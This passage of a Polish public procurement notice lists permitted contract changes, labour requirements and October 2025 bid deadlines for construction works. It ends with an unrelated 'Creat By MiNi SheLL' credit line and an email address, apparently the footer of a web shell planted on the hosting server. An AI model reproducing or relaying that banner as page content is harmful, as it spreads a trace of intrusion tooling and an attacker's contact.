konserwatorskiego.<br/>Zmiana terminu realizacji Przedmiotu Umowy – w przypadku wystąpienia siły wyższej, konieczności realizacji robót<br/>dodatkowych lub zamiennych, opóźnienia Zamawiającego w przekazaniu terenu budowy lub dokonywaniu odbiorów,<br/>zawieszenia robót przez Zamawiającego, wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających<br/>prowadzenie robót zgodnie ze sztuką budowlaną, zmian dokumentacji projektowej, wystąpienia nieprzewidzianych<br/>przeszkód terenowych, geologicznych, archeologicznych lub wodnych, a także szczególnych trudności w pozyskiwaniu<br/>materiałów budowlanych, istotnych zmian na rynku pracy lub konieczności zmiany rodzaju, modelu lub producenta<br/>materiałów bądź technologii na równoważną lub lepszą, przy zachowaniu niepogorszonych parametrów technicznych.<br/>Zmiana osób uczestniczących w realizacji zamówienia – po stronie Wykonawcy lub Zamawiającego (kierownik budowy,<br/>kierownicy robót, inspektorzy nadzoru).<br/>Aktualizacja lub zmiana rozwiązań technicznych – z uwagi na postęp technologiczny, zmiany w przepisach, konieczność<br/>zastosowania rozwiązań korzystniejszych dla Zamawiającego, niepowodujących wzrostu ceny, lub zmian nieprzewidzianych<br/>przy zawarciu umowy.<br/>Zmiana wysokości wynagrodzenia brutto – w przypadku ustawowej zmiany stawki podatku VAT.<br/>Zmiany wynikające z okoliczności korzystnych lub celowych dla Zamawiającego, których nie mógł on przewidzieć przy<br/>zachowaniu należytej staranności, a także w zakresie prac niezbędnych do realizacji zamówienia podstawowego.<br/>Zmiany związane z koniecznością wykonania robót zamiennych – prowadzących do poprawy bezpieczeństwa,<br/>funkcjonalności lub usprawnienia procesu budowlanego, przy zachowaniu zgodności z dokumentacją projektową i ustawą<br/>Pzp.<br/>Zmiany wynikające z konieczności zaniechania realizacji części robót – w szczególności w razie decyzji administracyjnych,<br/>zaleceń konserwatorskich, błędów lub zmian projektowych albo konieczności zastosowania innych technologii robót. W<br/>takim przypadku zakres robót zostanie odpowiednio zmniejszony, z zastrzeżeniem minimalnego zakresu określonego w §10<br/>ust. 2 Umowy, a wynagrodzenie Wykonawcy zostanie obniżone proporcjonalnie.<br/>Dopuszcza się także zmiany umowy przewidziane w Specyfikacji Warunków Zamówienia, o ile zajdą podstawy do ich<br/>zastosowania. Wszelkie zmiany będą wprowadzane wyłącznie w granicach dopuszczonych przepisami prawa, w tym art.<br/>455 ustawy Pzp.<br/>Szczegółowe określenie rodzajów i warunków zmian znajduje się w Załączniku nr 9 do SWZ, w §15 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty (zaszyfrowane) i podpisane jednym z trzech rodzajów podpisów należy przeslać drogą elektroniczną za pośrednictwem Platformy e-zamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający nie dopuszcza urządzeń będących prototypem. Udowodnienie równoważności materiałów i urządzeń<br/>spoczywa na Wykonawcy. Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań oraz<br/>korzystania z opinii ekspertów, w tym opinii lub akceptacji właściwego Wojewódzkiego Konserwatora Zabytków

Creat By MiNi SheLL
Email: jattceo@gmail.com